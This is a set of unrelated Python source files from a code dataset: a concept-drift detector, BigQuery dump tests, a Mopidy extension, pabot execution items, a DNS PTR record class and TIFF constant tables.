>>> import numpy as np
>>> from skmultiflow.drift_detection import DDM
>>> ddm = DDM()
>>> # Simulating a data stream as a normal distribution of 1's and 0's
>>> data_stream = np.random.randint(2, size=2000)
>>> # Changing the data concept from index 999 to 1500, simulating an
>>> # increase in error rate
>>> for i in range(999, 1500):
... data_stream[i] = 0
>>> # Adding stream elements to DDM and verifying if drift occurred
>>> for i in range(2000):
... ddm.add_element(data_stream[i])
... if ddm.detected_warning_zone():
... print('Warning zone has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
... if ddm.detected_change():
... print('Change has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
"""
def __init__(self, min_num_instances=30, warning_level=2.0, out_control_level=3.0):
super().__init__()
self._init_min_num_instances = min_num_instances
self._init_warning_level = warning_level
self._init_out_control = out_control_level
self.sample_count = None
self.miss_prob = None
self.miss_std = None
self.miss_prob_sd_min = None
self.miss_prob_min = None
self.miss_sd_min = None
self.min_instances = None
self.warning_level = None
self.out_control_level = None
self.reset()
def reset(self):
""" reset
Resets the change detector parameters.
"""
super().reset()
self.sample_count = 1
self.miss_prob = 1.0
self.miss_std = 0.0
self.miss_prob_sd_min = float("inf")
self.miss_prob_min = float("inf")
self.miss_sd_min = float("inf")
self.min_instances = self._init_min_num_instances
self.warning_level = self._init_warning_level
self.out_control_level = self._init_out_control
def add_element(self, prediction):
""" Add a new element to the statistics
Parameters
----------
prediction: int (either 0 or 1)
This parameter indicates whether the last sample analyzed was
correctly classified or not. 1 indicates an error (miss-classification).
Notes
-----
After calling this method, to verify if change was detected or if
the learner is in the warning zone, one should call the super method
detected_change, which returns True if concept drift was detected and
False otherwise.
"""
if self.in_concept_change:
self.reset()
self.miss_prob = self.miss_prob + (prediction - self.miss_prob) / float(self.sample_count)
self.miss_std = np.sqrt(self.miss_prob * (1 - self.miss_prob) / float(self.sample_count))
self.sample_count += 1
self.estimation = self.miss_prob
self.in_concept_change = False
self.in_warning_zone = False
self.delay = 0
if self.sample_count < self.min_instances:
return
if self.miss_prob + self.miss_std <= self.miss_prob_sd_min:
self.miss_prob_min = self.miss_prob
self.miss_sd_min = self.miss_std
self.miss_prob_sd_min = self.miss_prob + self.miss_std
if self.miss_prob + self.miss_std > self.miss_prob_min + self.out_control_level * self.miss_sd_min:
self.in_concept_change = True
elif self.miss_prob + self.miss_std > self.miss_prob_min + self.warning_level * self.miss_sd_min:
self.in_warning_zone = True
else:
self.in_warning_zone = False
def get_info(self):
""" Collect information about the concept drift detector.
Returns
-------
string
Configuration for the concept drift detector.
"""
description = type(self).__name__ + ': '
description += 'min_num_instances: {} - '.format(self.min_instances)
description += 'warning_level: {} - '.format(self.warning_level)
description += 'out_control_level: {} - '.format(self.out_control_level)
return description
| StarcoderdataPython |
1745439 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import unittest
from datetime import datetime
from pytz import UTC
from bqdm.model.dataset import BigQueryAccessEntry, BigQueryDataset
from bqdm.model.schema import BigQuerySchemaField
from bqdm.model.table import BigQueryTable
from bqdm.util import dump
class TestUtil(unittest.TestCase):
def test_dump_dataset(self):
dataset1 = BigQueryDataset(
dataset_id='test1',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US'
)
expected_dump_data1 = """dataset_id: test1
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries: null
labels: null
"""
actual_dump_data1 = dump(dataset1)
self.assertEqual(expected_dump_data1, actual_dump_data1)
access_entry2 = BigQueryAccessEntry(
'OWNER',
'specialGroup',
'projectOwners'
)
dataset2 = BigQueryDataset(
dataset_id='test2',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
access_entries=(access_entry2, )
)
expected_dump_data2 = """dataset_id: test2
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries:
- role: OWNER
entity_type: specialGroup
entity_id: projectOwners
labels: null
"""
actual_dump_data2 = dump(dataset2)
self.assertEqual(expected_dump_data2, actual_dump_data2)
access_entry3 = BigQueryAccessEntry(
None,
'view',
{
'datasetId': 'test',
'projectId': 'test-project',
'tableId': 'test_table'
}
)
dataset3 = BigQueryDataset(
dataset_id='test3',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
access_entries=(access_entry3, )
)
expected_dump_data3 = """dataset_id: test3
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries:
- role: null
entity_type: view
entity_id:
datasetId: test
projectId: test-project
tableId: test_table
labels: null
"""
actual_dump_data3 = dump(dataset3)
self.assertEqual(expected_dump_data3, actual_dump_data3)
dataset4 = BigQueryDataset(
dataset_id='test4',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
access_entries=(access_entry2, access_entry3)
)
expected_dump_data4 = """dataset_id: test4
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries:
- role: OWNER
entity_type: specialGroup
entity_id: projectOwners
- role: null
entity_type: view
entity_id:
datasetId: test
projectId: test-project
tableId: test_table
labels: null
"""
actual_dump_data4 = dump(dataset4)
self.assertEqual(expected_dump_data4, actual_dump_data4)
label5 = {
'foo': 'bar'
}
dataset5 = BigQueryDataset(
dataset_id='test5',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
labels=label5
)
expected_dump_data5 = """dataset_id: test5
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries: null
labels:
foo: bar
"""
actual_dump_data5 = dump(dataset5)
self.assertEqual(expected_dump_data5, actual_dump_data5)
label6 = {
'aaa': 'bbb',
'ccc': 'ddd'
}
dataset6 = BigQueryDataset(
dataset_id='test6',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
labels=label6
)
expected_dump_data6 = """dataset_id: test6
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries: null
labels:
aaa: bbb
ccc: ddd
"""
actual_dump_data6 = dump(dataset6)
self.assertEqual(expected_dump_data6, actual_dump_data6)
def test_dump_table(self):
table1 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description'
)
expected_dump_data1 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema: null
labels: null
"""
actual_dump_data1 = dump(table1)
self.assertEqual(expected_dump_data1, actual_dump_data1)
table2 = BigQueryTable(
table_id='test',
friendly_name='fizz_buzz',
description='foo_bar',
expires=datetime(2018, 1, 1, 0, 0, 0, tzinfo=UTC),
partitioning_type='DAY',
)
expected_dump_data2 = """table_id: test
friendly_name: fizz_buzz
description: foo_bar
expires: 2018-01-01T00:00:00.000000+0000
partitioning_type: DAY
view_use_legacy_sql: null
view_query: null
schema: null
labels: null
"""
actual_dump_data2 = dump(table2)
self.assertEqual(expected_dump_data2, actual_dump_data2)
table3 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
view_use_legacy_sql=False,
view_query="""SELECT * FROM
bigquery_datasetmanager.test.test"""
)
expected_dump_data3 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: false
view_query: |-
SELECT * FROM
bigquery_datasetmanager.test.test
schema: null
labels: null
"""
actual_dump_data3 = dump(table3)
self.assertEqual(expected_dump_data3, actual_dump_data3)
schema_field1 = BigQuerySchemaField(
name='test1',
field_type='INTEGER',
mode='NULLABLE',
description='test_description'
)
schema_field2 = BigQuerySchemaField(
name='test2',
field_type='STRING',
mode='REQUIRED',
description='foo_bar'
)
schema_field3 = BigQuerySchemaField(
name='test3',
field_type='RECORD',
mode='NULLABLE',
description='fizz_buzz',
fields=(schema_field1, schema_field2)
)
schema_field4 = BigQuerySchemaField(
name='test4',
field_type='RECORD',
mode='NULLABLE',
description='aaa_bbb',
fields=(schema_field3, )
)
table4 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
schema=(schema_field1, )
)
expected_dump_data4 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema:
- name: test1
field_type: INTEGER
mode: NULLABLE
description: test_description
fields: null
labels: null
"""
actual_dump_data4 = dump(table4)
self.assertEqual(expected_dump_data4, actual_dump_data4)
table5 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
schema=(schema_field1, schema_field2)
)
expected_dump_data5 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema:
- name: test1
field_type: INTEGER
mode: NULLABLE
description: test_description
fields: null
- name: test2
field_type: STRING
mode: REQUIRED
description: foo_bar
fields: null
labels: null
"""
actual_dump_data5 = dump(table5)
self.assertEqual(expected_dump_data5, actual_dump_data5)
table6 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
schema=(schema_field3, )
)
expected_dump_data6 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema:
- name: test3
field_type: RECORD
mode: NULLABLE
description: fizz_buzz
fields:
- name: test1
field_type: INTEGER
mode: NULLABLE
description: test_description
fields: null
- name: test2
field_type: STRING
mode: REQUIRED
description: foo_bar
fields: null
labels: null
"""
actual_dump_data6 = dump(table6)
self.assertEqual(expected_dump_data6, actual_dump_data6)
table7 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
schema=(schema_field4, )
)
expected_dump_data7 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema:
- name: test4
field_type: RECORD
mode: NULLABLE
description: aaa_bbb
fields:
- name: test3
field_type: RECORD
mode: NULLABLE
description: fizz_buzz
fields:
- name: test1
field_type: INTEGER
mode: NULLABLE
description: test_description
fields: null
- name: test2
field_type: STRING
mode: REQUIRED
description: foo_bar
fields: null
labels: null
"""
actual_dump_data7 = dump(table7)
self.assertEqual(expected_dump_data7, actual_dump_data7)
label1 = {
'foo': 'bar'
}
label2 = {
'fizz': 'buzz',
'aaa': 'bbb'
}
table8 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
labels=label1
)
expected_dump_data8 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema: null
labels:
foo: bar
"""
actual_dump_data8 = dump(table8)
self.assertEqual(expected_dump_data8, actual_dump_data8)
table9 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
labels=label2
)
expected_dump_data9 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema: null
labels:
aaa: bbb
fizz: buzz
"""
actual_dump_data9 = dump(table9)
self.assertEqual(expected_dump_data9, actual_dump_data9)
| StarcoderdataPython |
62514 | <reponame>hayribakici/mopidy-beep<filename>mopidy_beep/__init__.py<gh_stars>0
'''
Mopidy Beep Python module.
'''
import os
import mopidy
__version__ = '0.1'
class Extension(mopidy.ext.Extension):
'''
Mopidy Beep extension.
'''
dist_name = 'Mopidy-Beep'
ext_name = 'beep'
version = __version__
def get_default_config(self): # pylint: disable=no-self-use
'''
Return the default config.
:return: The default config
'''
conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
return mopidy.config.read(conf_file)
def get_config_schema(self):
'''
Return the config schema.
:return: The config schema
'''
schema = super(Extension, self).get_config_schema()
return schema
def validate_environment(self):
# Any manual checks of the environment to fail early.
# Dependencies described by setup.py are checked by Mopidy, so you
# should not check their presence here.
pass
def setup(self, registry):
'''
Setup the extension.
:param mopidy.ext.Registry: The mopidy registry
'''
from .frontend import BeepFrontend
registry.add('frontend', BeepFrontend)
| StarcoderdataPython |
3281131 | <filename>pabot/execution_items.py
from functools import total_ordering
from robot import __version__ as ROBOT_VERSION
from robot.errors import DataError
from robot.utils import PY2, is_unicode
from typing import List, Optional, Union, Dict, Tuple
@total_ordering
class ExecutionItem(object):
isWait = False
type = None # type: str
name = None # type: str
def top_name(self):
# type: () -> str
return self.name.split('.')[0]
def contains(self, other):
# type: (ExecutionItem) -> bool
return False
def difference(self, from_items):
# type: (List[ExecutionItem]) -> List[ExecutionItem]
return []
def line(self):
# type: () -> str
return ""
def modify_options_for_executor(self, options):
options[self.type] = self.name
def __eq__(self, other):
if isinstance(other, ExecutionItem):
return ((self.name, self.type) == (other.name, other.type))
return NotImplemented
def __ne__(self, other):
return not (self == other)
def __lt__(self, other):
return ((self.name, self.type) < (other.name, other.type))
def __hash__(self):
return hash(self.name) | hash(self.type)
def __repr__(self):
return "<" + self.type + ":" + self.name + ">"
class HivedItem(ExecutionItem):
type = 'hived'
def __init__(self, item, hive):
self._item = item
self._hive = hive
def modify_options_for_executor(self, options):
self._item.modify_options_for_executor(options)
@property
def name(self):
return self._item.name
class GroupItem(ExecutionItem):
type = 'group'
def __init__(self):
self.name = 'Group_'
self._items = []
self._element_type = None
def add(self, item):
if item.isWait:
raise DataError("[EXCEPTION] Ordering : Group can not contain #WAIT")
if self._element_type and self._element_type != item.type:
raise DataError("[EXCEPTION] Ordering : Group can contain only test or suite elements. Not bouth")
if len(self._items) > 0:
self.name += '_'
self.name += item.name
self._element_type = item.type
self._items.append(item)
def modify_options_for_executor(self, options):
for item in self._items:
if item.type not in options:
options[item.type] = []
opts = {}
item.modify_options_for_executor(opts)
options[item.type].append(opts[item.type])
class SuiteItem(ExecutionItem):
type = 'suite'
def __init__(self, name, tests=None, suites=None, dynamictests=None):
# type: (str, Optional[List[str]], Optional[List[str]], Optional[List[str]]) -> None
assert((PY2 and isinstance(name, basestring)) or isinstance(name, str))
self.name = name.encode("utf-8") if PY2 and is_unicode(name) else name
testslist = [TestItem(t) for t in tests or []] # type: List[Union[TestItem, DynamicTestItem]]
dynamictestslist = [DynamicTestItem(t, self.name) for t in dynamictests or []] # type: List[Union[TestItem, DynamicTestItem]]
self.tests = testslist + dynamictestslist
self.suites = [SuiteItem(s) for s in suites or []]
def line(self):
# type: () -> str
return '--suite '+self.name
def difference(self, from_items):
# type: (List[ExecutionItem]) -> List[ExecutionItem]
if self.tests:
return [t for t in self.tests if t not in from_items]
if self.suites:
return [s for s in self.suites if s not in from_items]
return []
def contains(self, other):
# type: (ExecutionItem) -> bool
if self == other:
return True
return other.name.startswith(self.name+".")
def tags(self):
#TODO Make this happen
return []
class TestItem(ExecutionItem):
type = 'test'
def __init__(self, name):
# type: (str) -> None
self.name = name.encode("utf-8") if PY2 and is_unicode(name) else name
def line(self):
# type: () -> str
return '--test '+self.name
if ROBOT_VERSION >= '3.1':
def modify_options_for_executor(self, options):
if 'rerunfailed' in options:
del options['rerunfailed']
name = self.name
for char in ['[', '?', '*']:
name = name.replace(char, '['+char+']')
options[self.type] = name
else:
def modify_options_for_executor(self, options):
if 'rerunfailed' in options:
del options['rerunfailed']
def difference(self, from_items):
# type: (List[ExecutionItem]) -> List[ExecutionItem]
return []
def contains(self, other):
# type: (ExecutionItem) -> bool
return self == other
def tags(self):
#TODO Make this happen
return []
class DynamicSuiteItem(SuiteItem):
type = 'dynamicsuite'
def __init__(self, name, variables):
SuiteItem.__init__(self, name)
self._variables = variables
def modify_options_for_executor(self, options):
variables = options.get('variable', [])[:]
variables.extend(self._variables)
options['variable'] = variables
class DynamicTestItem(ExecutionItem):
type = 'dynamictest'
def __init__(self, name, suite):
# type: (str, str) -> None
self.name = name.encode("utf-8") if PY2 and is_unicode(name) else name
self.suite = suite # type:str
def line(self):
return 'DYNAMICTEST %s :: %s' % (self.suite, self.name)
def modify_options_for_executor(self, options):
options['suite'] = self.suite
variables = options.get('variable', [])[:]
variables.append("DYNAMICTEST:"+self.name)
options['variable'] = variables
def difference(self, from_items):
return []
def contains(self, other):
return self == other
def tags(self):
#TODO Make this happen
return []
class WaitItem(ExecutionItem):
type = "wait"
isWait = True
def __init__(self):
self.name = "#WAIT"
def line(self):
return self.name
class GroupStartItem(ExecutionItem):
type = "group"
def __init__(self):
self.name = "#START"
def line(self):
return "{"
class GroupEndItem(ExecutionItem):
type = "group"
def __init__(self):
self.name = "#END"
def line(self):
return "}"
class IncludeItem(ExecutionItem):
type = "include"
def __init__(self, tag):
self.name = tag
def line(self):
return '--include '+self.name
def contains(self, other):
return self.name in other.tags()
def tags(self):
return [self.name]
class SuiteItems(ExecutionItem):
type = "suite"
def __init__(self, suites):
self.suites = suites
self.name = " ".join([suite.name for suite in suites])
def modify_options_for_executor(self, options):
options['suite'] = [suite.name for suite in self.suites] | StarcoderdataPython |
102280 | from .base import ResourceRecord
from ..domains.domain import Domain
class PTR(ResourceRecord):
class _Binary(ResourceRecord._Binary):
@property
def full(self):
return self.resource_record.ptrdname.binary_raw
id = 12
repr = ['ptrdname']
@classmethod
def parse_bytes(cls, answer, read_len):
instance = cls(answer)
instance.ptrdname = Domain.decode(answer.message)
return instance
@classmethod
def parse_dict(cls, answer, data):
instance = cls(answer)
instance.ptrdname = Domain(data.get('ptrdname'))
return instance
@property
def __dict__(self):
return {'ptrdname': self.ptrdname}
@classmethod
def from_json(cls, answer, data):
instance = cls(answer)
instance.ptrdname = Domain(data.get('ptrdname'))
return instance | StarcoderdataPython |
3325222 | <gh_stars>10-100
# flake8: noqa 501
# Disable flake8 line-length check (E501), it makes this file harder to read
import struct
from .exceptions import UnknownTagError
class TiffConstant(int):
def __new__(cls, value, *args, **kwargs):
return super().__new__(cls, value)
def __init__(self, value, constantDict):
"""
Create a constant. The constant is at least a value and an
associated name. It can have other properties.
:param value: an integer.
:param constantDict: a dictionary with at least a 'name' key.
"""
self.__dict__.update(constantDict)
self.value = value
self.name = str(getattr(self, 'name', self.value))
def __str__(self):
if str(self.name) != str(self.value):
return '%s %d (0x%X)' % (self.name, self.value, self.value)
return '%d (0x%X)' % (self.value, self.value)
def __getitem__(self, key):
if hasattr(self, str(key)):
return getattr(self, str(key))
raise KeyError(key)
def __int__(self):
return self.value
def __eq__(self, other):
if isinstance(other, TiffConstant):
return self.value == other.value and self.name == other.name
try:
intOther = int(other)
return self.value == intOther
except ValueError:
try:
intOther = int(other, 0)
return self.value == intOther
except ValueError:
pass
except TypeError:
return False
return self.name.upper() == other.upper()
def __ne__(self, other):
return not self.__eq__(other)
def __contains__(self, other):
return hasattr(self, str(other))
def __hash__(self):
return hash((type(self).__name__, self.value))
def get(self, key, default=None):
if hasattr(self, str(key)):
return getattr(self, str(key))
return default
class TiffTag(TiffConstant):
def isOffsetData(self):
return 'bytecounts' in self
def isIFD(self):
datatypes = self.get('datatype', None)
if not isinstance(datatypes, tuple):
return datatypes == Datatype.IFD or datatypes == Datatype.IFD8
return Datatype.IFD in datatypes or Datatype.IFD8 in datatypes
class TiffConstantSet(object):
def __init__(self, setNameOrClass, setDict):
"""
Create a set of TiffConstant values.
:param setNameOrClass: the set name or class; this is the class name
for the constants. If a class, this must be a subclass of
TiffConstant.
:param setDict: a dictionary to turn into TiffConstant values. The
keys should be integers and the values dictionaries with at least a
name key.
"""
if isinstance(setNameOrClass, str):
setClass = type(setNameOrClass, (TiffConstant,), {})
globals()[setNameOrClass] = setClass
else:
setClass = setNameOrClass
entries = {}
names = {}
for k, v in setDict.items():
entry = setClass(k, v)
entries[k] = entry
names[entry.name.upper()] = entry
names[str(int(entry))] = entry
if 'altnames' in v:
for altname in v['altnames']:
names[altname.upper()] = entry
self.__dict__.update(names)
self._entries = entries
self._setClass = setClass
def __contains__(self, other):
return hasattr(self, str(other))
def __getattr__(self, key):
try:
key = str(int(key, 0))
except (ValueError, TypeError):
pass
try:
return self.__dict__[key.upper()]
except KeyError:
raise AttributeError("'%s' object has no attribute '%s'" % (type(self).__name__, key))
def __getitem__(self, key):
if isinstance(key, TiffConstant):
key = int(key)
try:
return getattr(self, str(key))
except AttributeError:
raise KeyError(key)
def get(self, key, default=None):
if hasattr(self, str(key)):
return getattr(self, str(key))
return default
def __iter__(self):
for k, v in sorted(self._entries.items()):
yield v
def get_or_create_tag(key, tagSet=None, upperLimit=True, **tagOptions):
"""
Get a tag from a tag set. If the key does not exist and can be converted
to an integer, create a tag with that value of the same type as used by the
specified tag set. If no tag set is specified, return a TiffConstant with
the specified value.
:param key: the name or value of the tag to get or create.
:param tagSet: optional TiffConstantSet with known tags.
:param upperLimit: if True, don't allow new tags with values >= 65536.
Such tags are used for signaling in libtiff, so this can optionally be
allowed.
:param **tagOptions: if tag needs to be created and this is specified, add
this as part of creating the tag.
:returns: a TiffConstant.
"""
if tagSet and key in tagSet:
return tagSet[key]
try:
value = int(key)
except ValueError:
try:
value = int(key, 0)
except ValueError:
value = -1
if tagSet and value in tagSet:
return tagSet[value]
if value < 0 or (upperLimit and value >= 65536):
raise UnknownTagError('Unknown tag %s' % key)
tagClass = tagSet._setClass if tagSet else TiffTag
return tagClass(value, tagOptions)
Datatype = TiffConstantSet('TiffDatatype', {
1: {'pack': 'B', 'name': 'BYTE', 'size': 1, 'desc': 'UINT8 - unsigned byte'},
2: {'pack': None, 'name': 'ASCII', 'size': 1, 'desc': 'null-terminated string'},
3: {'pack': 'H', 'name': 'SHORT', 'size': 2, 'desc': 'UINT16 - unsigned short'},
4: {'pack': 'L', 'name': 'LONG', 'size': 4, 'desc': 'UINT32 - unsigned long', 'altnames': {'DWORD'}},
5: {'pack': 'LL', 'name': 'RATIONAL', 'size': 8, 'desc': 'two UINT32 - two unsigned longs forming a numerator and a denominator'},
6: {'pack': 'b', 'name': 'SBYTE', 'size': 1, 'desc': 'INT8 - signed byte'},
7: {'pack': None, 'name': 'UNDEFINED', 'size': 1, 'desc': 'arbitrary binary data'},
8: {'pack': 'h', 'name': 'SSHORT', 'size': 2, 'desc': 'INT16 - signed short'},
9: {'pack': 'l', 'name': 'SLONG', 'size': 4, 'desc': 'INT32 - signed long'},
10: {'pack': 'll', 'name': 'SRATIONAL', 'size': 8, 'desc': 'two INT32 - two signed longs forming a numerator and a denominator'},
11: {'pack': 'f', 'name': 'FLOAT', 'size': 4, 'desc': 'binary32 - IEEE-754 single-precision float'},
12: {'pack': 'd', 'name': 'DOUBLE', 'size': 8, 'desc': 'binary64 - IEEE-754 double precision float'},
13: {'pack': 'L', 'name': 'IFD', 'size': 4, 'desc': 'UINT32 - unsigned long with the location of an Image File Directory'},
16: {'pack': 'Q', 'name': 'LONG8', 'size': 8, 'desc': 'UINT64 - unsigned long long'},
17: {'pack': 'q', 'name': 'SLONG8', 'size': 8, 'desc': 'INT64 - signed long long'},
18: {'pack': 'Q', 'name': 'IFD8', 'size': 8, 'desc': 'UINT64 - unsigned long long with the location of an Image File Directory'},
})
NewSubfileType = TiffConstantSet('TiffNewSubfileType', {
1: {'name': 'ReducedImage', 'bitfield': 1, 'desc': 'Image is a reduced-resolution version of another image in this TIFF file'},
2: {'name': 'Page', 'bitfield': 2, 'desc': 'Image is a single page of a multi-page image'},
4: {'name': 'Mask', 'bitfield': 4, 'desc': 'Image defines a transparency mask for another image in this TIFF file'},
# Macro is based on Aperio's use
8: {'name': 'Macro', 'bitfield': 8, 'desc': 'Image is an associated macro image'},
16: {'name': 'MRC', 'bitfield': 16, 'desc': 'Mixed Raster Content'},
})
OldSubfileType = TiffConstantSet('TiffOldSubfileType', {
1: {'name': 'Image', 'desc': 'Full-resolution image data'},
2: {'name': 'ReducedImage', 'desc': 'Reduced-resolution image data'},
3: {'name': 'Page', 'desc': 'A single page of a multi-page image (see the PageNumber field description'},
})
Compression = TiffConstantSet('TiffCompression', {
1: {'name': 'None', 'desc': 'No compression, but pack data into bytes as tightly as possible leaving no unused bits except at the end of a row'},
2: {'name': 'CCITTRLE', 'desc': 'CCITT Group 3 1-Dimensional Modified Huffman run-length encoding'},
3: {'name': 'CCITT_T4', 'altnames': {'CCITTFAX3'}, 'desc': 'CCITT Group 3 fax encoding (T4-encoding: CCITT T.4 bi-level encoding)'},
4: {'name': 'CCITT_T6', 'altnames': {'CCITTFAX4'}, 'desc': 'CCITT Group 4 fax encoding (T6-encoding: CCITT T.6 bi-level encoding'},
5: {'name': 'LZW'},
6: {'name': 'OldJPEG', 'desc': 'Pre-version 6.0 JPEG', 'lossy': True},
7: {'name': 'JPEG', 'lossy': True},
8: {'name': 'AdobeDeflate', 'desc': 'Adobe deflate'},
9: {'name': 'T85', 'desc': 'TIFF/FX T.85 JBIG compression'},
10: {'name': 'T43', 'desc': 'TIFF/FX T.43 colour by layered JBIG compression'},
32766: {'name': 'NeXT', 'desc': 'NeXT 2-bit RLE'},
32771: {'name': 'CCITTRLEW', 'desc': '#1 w/ word alignment'},
32773: {'name': 'Packbits', 'desc': 'Macintosh RLE'},
32809: {'name': 'Thunderscan', 'desc': 'ThunderScan RLE'},
32895: {'name': 'IT8CTPad', 'desc': 'IT8 CT w/padding'},
32896: {'name': 'IT8LW', 'desc': 'IT8 Linework RLE'},
32897: {'name': 'IT8MP', 'desc': 'IT8 Monochrome picture'},
32898: {'name': 'IT8BL', 'desc': 'IT8 Binary line art'},
32908: {'name': 'PixarFilm', 'desc': 'Pixar companded 10bit LZW'},
32909: {'name': 'PixarLog', 'desc': 'Pixar companded 11bit ZIP'},
32946: {'name': 'Deflate', 'desc': 'Deflate compression'},
32947: {'name': 'DCS', 'desc': 'Kodak DCS encoding'},
33003: {'name': 'JP2kYCbCr', 'desc': 'JPEG 2000 with YCbCr format as used by Aperio', 'lossy': True},
33004: {'name': 'JP2kLossy', 'desc': 'JPEG 2000 with lossy compression as used by Bioformats', 'lossy': True},
33005: {'name': 'JP2kRGB', 'desc': 'JPEG 2000 with RGB format as used by Aperio', 'lossy': True},
34661: {'name': 'JBIG', 'desc': 'ISO JBIG'},
34676: {'name': 'SGILOG', 'desc': 'SGI Log Luminance RLE'},
34677: {'name': 'SGILOG24', 'desc': 'SGI Log 24-bit packed'},
34712: {'name': 'JP2000', 'desc': 'Leadtools JPEG2000', 'lossy': True},
34887: {'name': 'LERC', 'desc': 'ESRI Lerc codec: https://github.com/Esri/lerc', 'lossy': True},
34925: {'name': 'LZMA', 'desc': 'LZMA2'},
50000: {'name': 'ZSTD', 'desc': 'ZSTD'},
50001: {'name': 'WEBP', 'desc': 'WEBP', 'lossy': True},
})
Photometric = TiffConstantSet('TiffPhotometric', {
0: {'name': 'MinIsWhite', 'desc': 'Min value is white'},
1: {'name': 'MinIsBlack', 'desc': 'Min value is black'},
2: {'name': 'RGB', 'desc': 'RGB color model'},
3: {'name': 'Palette', 'desc': 'Indexed color map'},
4: {'name': 'Mask', 'desc': 'Mask'},
5: {'name': 'Separated', 'desc': 'Color separations'},
6: {'name': 'YCbCr', 'desc': 'CCIR 601'},
8: {'name': 'CIELab', 'desc': '1976 CIE L*a*b*'},
9: {'name': 'ICCLab', 'desc': 'ICC L*a*b*'},
10: {'name': 'ITULab', 'desc': 'ITU L*a*b*'},
32803: {'name': 'CFA', 'desc': 'Color filter array'},
32844: {'name': 'LogL', 'desc': 'CIE Log2(L)'},
32845: {'name': 'LogLuv', 'desc': 'CIE Log2(L) (u\',v\')'},
})
Thresholding = TiffConstantSet('TiffThresholding', {
1: {'name': 'Bilevel', 'desc': 'No dithering or halftoning has been applied to the image data'},
2: {'name': 'Halftone', 'desc': 'An ordered dither or halftone technique has been applied to the image data'},
3: {'name': 'ErrorDiffuse', 'desc': 'A randomized process such as error diffusion has been applied to the image data'},
})
FillOrder = TiffConstantSet('TiffFillOrder', {
1: {'name': 'MSBToLSB', 'desc': 'Pixels are arranged within a byte such that pixels with lower column values are stored in the higher-order bits of the byte'},
2: {'name': 'LSBToMSB', 'desc': 'Pixels are arranged within a byte such that pixels with lower column values are stored in the lower-order bits of the byte'},
})
Orientation = TiffConstantSet('Orientation', {
1: {'name': 'TopLeft', 'desc': 'Row 0 top, column 0 left'},
2: {'name': 'TopRight', 'desc': 'Row 0 top, column 0 right'},
3: {'name': 'BottomRight', 'desc': 'Row 0 bottom, column 0 right'},
4: {'name': 'BottomLeft', 'desc': 'Row 0 bottom, column 0 left'},
5: {'name': 'LeftTop', 'desc': 'Row 0 left, column 0 top'},
6: {'name': 'RightTop', 'desc': 'Row 0 right, column 0 top'},
7: {'name': 'RightBottom', 'desc': 'Row 0 right, column 0 bottom'},
8: {'name': 'LeftBottom', 'desc': 'Row 0 left, column 0 bottom'},
})
PlanarConfig = TiffConstantSet('PlanarConfig', {
1: {'name': 'Chunky', 'altnames': {'Contig', 'Continuous'}, 'desc': 'The component values for each pixel are stored contiguously'},
2: {'name': 'Planar', 'altnames': {'Separate'}, 'desc': 'The components are stored in separate “component planes.'},
})
T4Options = TiffConstantSet('TiffT4Options', {
1: {'name': '2DEncoding', 'bitfield': 1, 'desc': 'Set for two dimensional encoding'},
2: {'name': 'Uncompressed', 'bitfield': 2, 'desc': 'Set if uncompressed mode is used'},
4: {'name': 'FillBits', 'bitfield': 4, 'desc': 'Set if fill bits have been added'},
})
T6Options = TiffConstantSet('TiffT6Options', {
2: {'name': 'Uncompressed', 'bitfield': 2, 'desc': 'Set if uncompressed mode is used'},
})
ResolutionUnit = TiffConstantSet('ResolutionUnit', {
1: {'name': 'None', 'desc': 'No absolute unit of measurement'},
2: {'name': 'Inch', 'altnames': {'in', 'inches'}},
3: {'name': 'Centimeter', 'altnames': {'cm'}},
})
Predictor = TiffConstantSet('Predictor', {
1: {'name': 'None', 'desc': 'No predictor'},
2: {'name': 'Horizontal'},
3: {'name': 'FloatingPoint'},
